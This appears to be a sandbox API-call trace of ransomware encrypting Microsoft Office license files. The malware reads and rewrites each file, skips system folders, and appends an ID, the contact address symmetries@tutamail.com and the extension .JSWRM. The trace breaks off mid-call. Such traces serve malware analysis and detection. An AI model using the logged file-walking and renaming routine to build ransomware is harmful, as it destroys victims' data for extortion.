WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdVL_MAK-ul-phn.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0108.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0108.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdVL_MAK-ul-phn.xrm-ms", cchWideChar=30, lpMultiByteStr=0x241308, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdVL_MAK-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0108.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0108.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0108.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0108.783] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.783] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0108.783] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdVL_MAK-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdvl_mak-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.783] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19946) returned 1 [0108.783] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4de0) returned 0x24c1d0 [0108.783] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4de0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4de0, lpOverlapped=0x0) returned 1 [0108.786] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.786] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4de0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4de0, lpOverlapped=0x0) returned 1 [0108.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.786] CloseHandle (hObject=0x45c) returned 1 [0108.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0108.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0108.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0108.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0108.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0108.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0108.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0108.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0108.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.787] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdVL_MAK-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdvl_mak-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdVL_MAK-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdvl_mak-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0108.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0108.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0108.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0108.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0108.788] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9ea28c3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe9ea28c3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe9f6133d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bbf, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusDemoR_BypassTrial180-pl.xrm-ms", cAlternateFileName="PR6389~1.XRM")) returned 1 [0108.788] lstrcmpiW (lpString1="ProPlusDemoR_BypassTrial180-pl.xrm-ms", lpString2=".") returned 1 [0108.788] lstrcmpiW (lpString1="ProPlusDemoR_BypassTrial180-pl.xrm-ms", lpString2="..") returned 1 [0108.788] lstrcmpiW (lpString1="ProPlusDemoR_BypassTrial180-pl.xrm-ms", lpString2="...") returned 1 [0108.788] lstrcmpiW (lpString1="ProPlusDemoR_BypassTrial180-pl.xrm-ms", lpString2="windows") returned -1 [0108.788] lstrcmpiW (lpString1="ProPlusDemoR_BypassTrial180-pl.xrm-ms", lpString2="recovery") returned -1 [0108.788] lstrcmpiW (lpString1="ProPlusDemoR_BypassTrial180-pl.xrm-ms", lpString2="perflogs") returned 1 [0108.788] lstrcmpiW (lpString1="ProPlusDemoR_BypassTrial180-pl.xrm-ms", lpString2="documents and settings") returned 1 [0108.788] lstrcmpiW (lpString1="ProPlusDemoR_BypassTrial180-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.788] lstrcmpiW (lpString1="ProPlusDemoR_BypassTrial180-pl.xrm-ms", lpString2="system volume information") returned -1 [0108.788] lstrcmpiW (lpString1="ProPlusDemoR_BypassTrial180-pl.xrm-ms", lpString2="msocache") returned 1 [0108.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0108.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusDemoR_BypassTrial180-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0108.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0108.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusDemoR_BypassTrial180-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d0a0, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusDemoR_BypassTrial180-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0108.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0108.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0108.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusDemoR_BypassTrial180-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0108.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0108.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusDemoR_BypassTrial180-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22cdc8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusDemoR_BypassTrial180-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0108.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0108.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0108.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0108.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0108.789] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusDemoR_BypassTrial180-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusdemor_bypasstrial180-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.789] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11199) returned 1 [0108.789] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bb0) returned 0x24c1d0 [0108.789] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2bb0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2bb0, lpOverlapped=0x0) returned 1 [0108.793] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.794] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bb0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2bb0, lpOverlapped=0x0) returned 1 [0108.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.794] CloseHandle (hObject=0x45c) returned 1 [0108.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0108.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0108.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0108.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0108.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b380 [0108.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f4d0 [0108.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b380 | out: hHeap=0x1e0000) returned 1 [0108.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0108.794] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusDemoR_BypassTrial180-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusdemor_bypasstrial180-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusDemoR_BypassTrial180-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusdemor_bypasstrial180-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0108.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0108.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0108.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0108.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0108.797] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9e5633f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe9e5633f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe9eeec59, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5f71, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusDemoR_BypassTrial180-ppd.xrm-ms", cAlternateFileName="PROPLU~4.XRM")) returned 1 [0108.797] lstrcmpiW (lpString1="ProPlusDemoR_BypassTrial180-ppd.xrm-ms", lpString2=".") returned 1 [0108.797] lstrcmpiW (lpString1="ProPlusDemoR_BypassTrial180-ppd.xrm-ms", lpString2="..") returned 1 [0108.797] lstrcmpiW (lpString1="ProPlusDemoR_BypassTrial180-ppd.xrm-ms", lpString2="...") returned 1 [0108.797] lstrcmpiW (lpString1="ProPlusDemoR_BypassTrial180-ppd.xrm-ms", lpString2="windows") returned -1 [0108.797] lstrcmpiW (lpString1="ProPlusDemoR_BypassTrial180-ppd.xrm-ms", lpString2="recovery") returned -1 [0108.797] lstrcmpiW (lpString1="ProPlusDemoR_BypassTrial180-ppd.xrm-ms", lpString2="perflogs") returned 1 [0108.798] lstrcmpiW (lpString1="ProPlusDemoR_BypassTrial180-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0108.798] lstrcmpiW (lpString1="ProPlusDemoR_BypassTrial180-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.798] lstrcmpiW (lpString1="ProPlusDemoR_BypassTrial180-ppd.xrm-ms", lpString2="system volume information") returned -1 [0108.798] lstrcmpiW (lpString1="ProPlusDemoR_BypassTrial180-ppd.xrm-ms", lpString2="msocache") returned 1 [0108.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bda8 [0108.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusDemoR_BypassTrial180-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0108.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0108.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusDemoR_BypassTrial180-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x22d0a0, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusDemoR_BypassTrial180-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0108.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bda8 | out: hHeap=0x1e0000) returned 1 [0108.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0108.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusDemoR_BypassTrial180-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0108.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusDemoR_BypassTrial180-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x22d260, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusDemoR_BypassTrial180-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0108.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0108.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b8f8 [0108.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0108.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b448 [0108.798] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusDemoR_BypassTrial180-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusdemor_bypasstrial180-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.799] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=24433) returned 1 [0108.799] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5f70) returned 0x24c1d0 [0108.799] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5f70, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5f70, lpOverlapped=0x0) returned 1 [0108.868] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.868] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5f70, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5f70, lpOverlapped=0x0) returned 1 [0108.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.868] CloseHandle (hObject=0x45c) returned 1 [0108.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0108.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0108.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0108.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0108.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a228 [0108.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a228, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a228 | out: hHeap=0x1e0000) returned 1 [0108.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0108.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f848 [0108.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0108.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0108.869] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusDemoR_BypassTrial180-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusdemor_bypasstrial180-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusDemoR_BypassTrial180-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusdemor_bypasstrial180-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0108.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0108.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b448 | out: hHeap=0x1e0000) returned 1 [0108.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0108.870] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea662288, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea662288, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea76d2b2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d81, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusDemoR_BypassTrial180-ul-oob.xrm-ms", cAlternateFileName="PRD20B~1.XRM")) returned 1 [0108.870] lstrcmpiW (lpString1="ProPlusDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2=".") returned 1 [0108.870] lstrcmpiW (lpString1="ProPlusDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="..") returned 1 [0108.871] lstrcmpiW (lpString1="ProPlusDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="...") returned 1 [0108.871] lstrcmpiW (lpString1="ProPlusDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="windows") returned -1 [0108.871] lstrcmpiW (lpString1="ProPlusDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0108.871] lstrcmpiW (lpString1="ProPlusDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0108.871] lstrcmpiW (lpString1="ProPlusDemoR_BypassTrial180-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0108.871] lstrcmpiW 